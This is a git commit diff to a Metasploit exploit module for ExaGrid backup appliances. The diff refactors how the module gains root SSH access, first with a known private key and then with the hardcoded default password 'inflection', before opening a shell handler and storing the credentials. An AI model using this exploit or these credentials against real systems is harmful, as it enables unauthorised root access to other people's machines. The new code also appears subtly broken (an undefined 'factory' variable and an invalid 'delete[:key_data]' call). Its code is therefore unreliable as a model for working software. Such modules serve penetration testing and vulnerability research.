fix the exagrid exploit module

split the exagrid exploit module up and refactor to be able to easily tell if the key or the password was used 7321
2016-09-15 11:44:19 -05:00 · 2016-09-15 11:44:19 -05:00 · e10c133eef
parent 7352029497
commit e10c133eef
2 changed files with 29 additions and 22 deletions
--- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb
+++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb
@ -211,8 +211,6 @@ class MetasploitModule < Msf::Auxiliary
        :key_data     => key_data[:public],
        :use_agent     => false,
        :config =>false,
-        #:skip_private_keys => true,
-        #:accepted_key_callback => Proc.new {|key| accepted << { :data => key_data, :key => key, :info => key_info } },
        :proxy	  => factory,
        :non_interactive => true
      }
--- a/modules/exploits/linux/ssh/exagrid_known_privkey.rb
+++ b/modules/exploits/linux/ssh/exagrid_known_privkey.rb
@ -72,26 +72,11 @@ class MetasploitModule < Msf::Exploit::Remote
    datastore['RPORT']
  end

-  def do_login(user)
-    factory = ssh_socket_factory
-    ssh_options = {
-      auth_methods: ['publickey', 'password'],
-      config: false,
-      use_agent: false,
-      key_data: [ key_data ],
-      msfmodule: self,
-      msframework: framework,
-      password: 'inflection',
-      port: rport,
-      proxy: factory,
-      non_interactive:  true
-    }
-    ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
-
+  def do_login(ssh_options)
    begin
      ssh_socket = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
-        ssh_socket = Net::SSH.start(rhost, user, ssh_options)
+        ssh_socket = Net::SSH.start(rhost, 'root', ssh_options)
      end
    rescue Rex::ConnectionError
      return
@ -132,7 +117,28 @@ class MetasploitModule < Msf::Exploit::Remote
  def exploit
    payload_instance.extend(TrustMeItsAShell)

-    conn = do_login("root")
+    ssh_options = {
+      auth_methods: ['publickey'],
+      config: false,
+      use_agent: false,
+      key_data: [ key_data ],
+      port: rport,
+      proxy: factory,
+      non_interactive:  true
+    }
+    ssh_options.merge!(verbose: :debug) if datastore['SSH_DEBUG']
+
+    conn = do_login(ssh_options)
+    unless is_success?(conn, true)
+      ssh_options[:auth_methods] = ['password']
+      ssh_options[:password] = 'inflection'
+      ssh_options.delete[:key_data]
+      conn = do_login(ssh_options)
+      is_success?(conn, false)
+    end
+  end
+
+  def is_success?(conn,key_based)
    if conn
      print_good "Successful login"
      service_data = {
@ -144,8 +150,8 @@ class MetasploitModule < Msf::Exploit::Remote
      }
      credential_data = {
        username: 'root',
-        private_type: (conn.ssh.auth_info[:method] == "publickey" ? :ssh_key : :password),
-        private_data: (conn.ssh.auth_info[:method] == "publickey" ? key_data : 'inflection'),
+        private_type: ( key_based ? :ssh_key : :password ),
+        private_data: ( key_based ? key_data : 'inflection' ),
        origin_type: :service,
        module_fullname: fullname,
      }.merge(service_data)
@ -159,6 +165,9 @@ class MetasploitModule < Msf::Exploit::Remote
      create_credential_login(login_data)

      handler(conn.lsock)
+      true
+    else
+      false
    end
  end